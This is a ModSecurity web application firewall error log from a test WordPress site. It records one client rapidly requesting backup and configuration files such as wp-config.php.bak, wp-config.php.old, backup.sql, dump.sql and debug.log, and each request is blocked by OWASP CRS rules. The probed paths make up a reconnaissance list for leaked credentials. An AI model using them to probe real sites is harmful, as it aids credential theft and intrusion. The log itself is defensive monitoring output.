[Thu Jan 01 09:26:34.073474 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "aVYvuv8XCgNe-1KotIuGpAAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:34.155824 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aVYvuv8XCgNe-1KotIuGpQAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:34.155998 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aVYvuv8XCgNe-1KotIuGpQAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:34.156218 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aVYvuv8XCgNe-1KotIuGpQAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:34.156365 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aVYvuv8XCgNe-1KotIuGpQAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:34.238921 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.save"] [unique_id "aVYvuv8XCgNe-1KotIuGpgAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:34.239160 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.save"] [unique_id "aVYvuv8XCgNe-1KotIuGpgAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:34.239314 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.save"] [unique_id "aVYvuv8XCgNe-1KotIuGpgAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:34.322163 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php~"] [unique_id "aVYvuv8XCgNe-1KotIuGpwAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:34.322420 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php~"] [unique_id "aVYvuv8XCgNe-1KotIuGpwAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:34.322571 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php~"] [unique_id "aVYvuv8XCgNe-1KotIuGpwAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:34.405001 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "wp-config.txt" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.txt found within REQUEST_FILENAME: /wp-config.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.txt"] [unique_id "aVYvuv8XCgNe-1KotIuGqAAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:34.405236 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.txt"] [unique_id "aVYvuv8XCgNe-1KotIuGqAAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:34.405394 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.txt"] [unique_id "aVYvuv8XCgNe-1KotIuGqAAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:34.487415 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup.sql"] [unique_id "aVYvuv8XCgNe-1KotIuGqQAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:34.487801 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup.sql"] [unique_id "aVYvuv8XCgNe-1KotIuGqQAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:34.487973 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup.sql"] [unique_id "aVYvuv8XCgNe-1KotIuGqQAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:34.570411 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database.sql"] [unique_id "aVYvuv8XCgNe-1KotIuGqgAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:34.570794 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database.sql"] [unique_id "aVYvuv8XCgNe-1KotIuGqgAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:34.570967 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database.sql"] [unique_id "aVYvuv8XCgNe-1KotIuGqgAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:34.653396 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/db.sql"] [unique_id "aVYvuv8XCgNe-1KotIuGqwAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:34.653777 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/db.sql"] [unique_id "aVYvuv8XCgNe-1KotIuGqwAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:34.653959 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/db.sql"] [unique_id "aVYvuv8XCgNe-1KotIuGqwAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:34.736003 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/dump.sql"] [unique_id "aVYvuv8XCgNe-1KotIuGrAAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:34.736352 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/dump.sql"] [unique_id "aVYvuv8XCgNe-1KotIuGrAAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:34.736500 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/dump.sql"] [unique_id "aVYvuv8XCgNe-1KotIuGrAAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:35.153019 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config.bak"] [unique_id "aVYvu_8XCgNe-1KotIuGsQAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:35.153428 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config.bak"] [unique_id "aVYvu_8XCgNe-1KotIuGsQAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:35.153629 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config.bak"] [unique_id "aVYvu_8XCgNe-1KotIuGsQAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:35.236106 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config.old"] [unique_id "aVYvu_8XCgNe-1KotIuGsgAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:35.236539 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config.old"] [unique_id "aVYvu_8XCgNe-1KotIuGsgAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:35.236719 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config.old"] [unique_id "aVYvu_8XCgNe-1KotIuGsgAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:35.486055 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/debug.log"] [unique_id "aVYvu_8XCgNe-1KotIuGtQAAAAI"], referer: https://www.google.com/
